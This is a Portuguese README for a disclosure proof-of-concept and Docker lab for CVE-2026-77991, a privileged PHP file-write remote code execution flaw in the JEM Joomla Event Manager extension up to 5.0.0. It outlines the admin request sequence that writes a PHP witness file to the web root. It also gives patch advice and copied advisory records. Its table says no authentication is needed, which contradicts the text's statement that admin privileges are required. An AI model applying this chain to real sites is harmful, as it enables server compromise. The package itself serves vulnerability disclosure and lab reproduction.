
Prova de conceito e pacote de laboratório para CVE-2026-77991, um RCE privilegiado de escrita de arquivo PHP no Joomla Event Manager até a versão 5.0.0, com laboratório Docker e verificação de testemunha.
abraxaslabs.tech · github.com/abraxas · @abraxas_null · CVE-2026-77991
JEM - Joomla Event Manager 5.0.0 — joomlaeventmanager.net
Extensão Joomla - joomlaeventmanager.net - Execução remota de código privilegiada no Joomla Event Manager < 5.0.1 - O modelo de origem do administrador permite gravar tipos de arquivo perigosos, incluindo PHP, levando à execução remota de código.
| CVE | CVE-2026-77991 · CVE.org |
| CWE | — |
| CVSS | ver advisory |
| Produto | JEM - Joomla Event Manager |
| Afetado | todas as versões até 5.0.0 (inclusive) |
| Corrigido | 5.0.1 e posteriores |
| Autenticação | nenhuma (ver mapa de origem) |
| Lab | apenas 127.0.0.1 · pacote de divulgação para fornecedor/cliente, não é um scanner |
O advisory nomeia o modelo de origem do administrador. O HTTP é com_jem task=source.save, não uma ação ajax=. O método PHP save() não é a URL. PR:H — POST não autenticado não é este CVE.
POST/administrator/index.phpPOST /administrator/index.php login (admin/labadmin)GET /administrator/index.php?option=com_jem&task=source.edit&id=<base64 poc_witness.php> (JemControllerSource::edit)POST option=com_jem task=source.save jform[filename]+jform[source]+token (controllers/source.php:136)JemModelSource::save File::write media/com_jem/css/<file> (models/source.php:359-396)GET /media/com_jem/css/poc_witness.phpGET /media/com_jem/css/poc_witness.php retorna POC_WITNESS_77991. Login 200 HTML ou falha de token não é isso.
Faça isto primeiro: Atualize o JEM - Joomla Event Manager para 5.0.1 ou mais recente.
Verifique após a atualização
CVE-2026-77991-Abraxas-Labs.py contra a versão corrigida: o witness mapeado não deve aparecer.Se você não puder atualizar imediatamente
Alvo apenas http://127.0.0.1:8088 (ou o loopback que você vinculou). Não aponte este script para a internet.
python3 CVE-2026-77991-Abraxas-Labs.py
Sucesso é o witness acima no corpo da resposta. HTML genérico 200 não é isso.
Stack de loopback usada para reprodução. Imagens oficiais, a menos que um Dockerfile nesta pasta compile a partir do código-fonte.
cd lab
docker compose up --force-recreate
Vincule a árvore do produto vulnerável ao lado do Compose se o YAML montar um diretório local (zip do plugin / tag de origem da tabela de versões). Não publique nada exceto 127.0.0.1.
# CVE-2026-77991 (structured records)
- input: `https://nvd.nist.gov/vuln/detail/CVE-2026-77991`
- CWE: n/a
- published: n/a
## NVD description
error: <urlopen error [Errno 8] nodename nor servname provided, or not known>
## MITRE description
Joomla Extension - joomlaeventmanager.net - Privileged remote code execution in Joomla Event Manager < 5.0.1 - The administrator source model allows to write dangerous file type incl. PHP, leading to remote code execution.
## Affected
- joomlaeventmanager.net JEM - Joomla Event Manager extension for Joomla 1.0.0-5.0.0 affected
## References (JSON sources only)
- https://www.joomlaeventmanager.net/
- https://github.com/advisories/GHSA-gh3c-9wwf-mj2v
- https://nvd.nist.gov/vuln/detail/CVE-2026-77991
- https://www.joomlaeventmanager.net
## GitHub advisory
Joomla Extension - joomlaeventmanager.net - Privileged remote code execution in Joomla Event...
Joomla Extension - joomlaeventmanager.net - Privileged remote code execution in Joomla Event Manager < 5.0.1 - The administrator source model allows to write dangerous file type incl. PHP, leading to remote code execution.
Este pacote é para o fornecedor, o proprietário do site e laboratórios licenciados. O script se comunica com 127.0.0.1. Usá-lo contra sistemas que você não possui não é autorizado pela Abraxas Labs. Sem garantia.